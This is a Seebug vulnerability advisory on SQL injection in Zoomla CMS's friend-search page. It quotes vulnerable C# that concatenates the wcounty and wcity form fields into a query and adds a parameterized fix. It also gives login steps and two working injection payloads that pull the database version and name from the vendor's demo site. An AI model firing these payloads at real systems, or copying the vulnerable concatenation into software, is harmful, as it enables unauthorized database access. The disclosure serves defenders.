Zoomla CMS (逐浪cms) SQL injection: one file, multiple parameters

2014-08-09T00:00:00
ID SSV:94249
Type seebug
Reporter Root
Modified 2014-08-09T00:00:00

Description

Brief description:

SQL injection in the latest version of Zoomla CMS.

Details:

The latest Zoomla version has a SQL injection reachable by any registered ordinary user. Visit

http://demo.zoomla.cn/User/Register.aspx

and register any user, e.g. test1234 with password 123456, then visit

http://demo.zoomla.cn/User/Login.aspx?ReturnUrl=

to log in, then visit

http://demo.zoomla.cn/User/UserFriend/FriendSearch/Friend_quickSYResult.aspx

The source of that page is as follows:

protected void Page_Load(object sender, EventArgs e)
{
    if (!base.IsPostBack)
    {
        string str = base.Request.Form["sex"];
        string str2 = base.Request.Form["age1"];
        string str3 = base.Request.Form["age2"];
        string str4 = base.Request.Form["wcounty"]; // not sanitized
        string str5 = base.Request.Form["wcity"];   // not sanitized
        string wherex = "";
        if (!string.IsNullOrEmpty(str))
        {
            if (str == "女生") { wherex = wherex + " and UserSex=0"; }      // "female"
            else if (str == "男生") { wherex = wherex + " and UserSex=1"; } // "male"
        }
        if (!string.IsNullOrEmpty(str2))
        {
            string str7 = DateTime.Now.AddYears(-Convert.ToInt32(str2)).ToShortDateString();
            wherex = wherex + " and BirthDay<='" + str7 + "'";
        }
        if (!string.IsNullOrEmpty(str3))
        {
            string str8 = DateTime.Now.AddYears(-Convert.ToInt32(str3)).ToShortDateString();
            wherex = wherex + " and BirthDay>='" + str8 + "'";
        }
        if (!string.IsNullOrEmpty(str4))
        {
            wherex = wherex + " and workProvince='" + str4 + "'"; // injection: raw value concatenated into SQL
            if (!string.IsNullOrEmpty(str5))
            {
                wherex = wherex + " and workCity='" + str5 + "'"; // injection: raw value concatenated into SQL
            }
        }
        this.ViewState["wherex"] = wherex;
        if (!this.buser.CheckLogin())
        {
            if (SiteConfig.UserConfig.EnableCheckCodeOfLogin) { this.PhValCode.Visible = true; }
            else { this.PhValCode.Visible = false; }
            this.dwindow.Style["display"] = "";
        }
        else
        {
            DataTable dt = new DataTable();
            dt = UserTableBLL.GetUsersInfo(wherex); // the concatenated WHERE fragment is executed as-is
            this.Bind(dt);
        }
    }
}
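Added here as an example of the corresponding fix (not Zoomla's own code): the same filter built with SqlParameter objects, so the wcounty and wcity values are compared literally and can no longer change the query structure. The table name [User], the System.Data.SqlClient provider and the NVarChar column sizes are assumptions; the real UserTableBLL.GetUsersInfo takes a raw WHERE string, so it would have to be changed to accept the command or its parameters.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Text;

// Added example, not Zoomla's code. Table name [User] and column sizes are assumptions.
public static class SafeFriendSearch
{
    public static SqlCommand BuildQuery(SqlConnection conn,
        string sex, string age1, string age2, string wcounty, string wcity)
    {
        SqlCommand cmd = conn.CreateCommand();
        var sql = new StringBuilder("SELECT * FROM [User] WHERE 1=1");

        // Sex: only two fixed literals are ever emitted, chosen by comparison,
        // so the raw form value never reaches the SQL text.
        if (sex == "女生") sql.Append(" AND UserSex=0");
        else if (sex == "男生") sql.Append(" AND UserSex=1");

        // Age bounds: int.TryParse instead of Convert.ToInt32 (which throws on
        // non-numeric input); the computed dates are bound as typed parameters.
        if (int.TryParse(age1, out int maxAge))
        {
            sql.Append(" AND BirthDay<=@maxBirth");
            cmd.Parameters.Add("@maxBirth", SqlDbType.Date).Value = DateTime.Today.AddYears(-maxAge);
        }
        if (int.TryParse(age2, out int minAge))
        {
            sql.Append(" AND BirthDay>=@minBirth");
            cmd.Parameters.Add("@minBirth", SqlDbType.Date).Value = DateTime.Today.AddYears(-minAge);
        }

        // wcounty / wcity: the two injection points in the original. Bound as
        // parameters, a value such as "16:01' AND ... --" is just a string to match.
        if (!string.IsNullOrEmpty(wcounty))
        {
            sql.Append(" AND workProvince=@province");
            cmd.Parameters.Add("@province", SqlDbType.NVarChar, 50).Value = wcounty;
            if (!string.IsNullOrEmpty(wcity))
            {
                sql.Append(" AND workCity=@city");
                cmd.Parameters.Add("@city", SqlDbType.NVarChar, 50).Value = wcity;
            }
        }

        cmd.CommandText = sql.ToString();
        return cmd;
    }
}
```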

Visit

http://demo.zoomla.cn/User\UserFriend\FriendSearch/Friend_quickSYResult.aspx

and submit

sex=%E7%94%B7%E7%94%9F&age1=&age2=&wcounty=16&wcity=16%3A01' AND (SELECT @@VERSION)>0 --

[Screenshot: 71.png]

Submit

sex=%E7%94%B7%E7%94%9F&age1=&age2=&wcounty=16&wcity=16%3A01' AND (SELECT db_name())>0 --

[Screenshot: 72.png]

Proof of vulnerability:

Proof of vulnerability as shown above.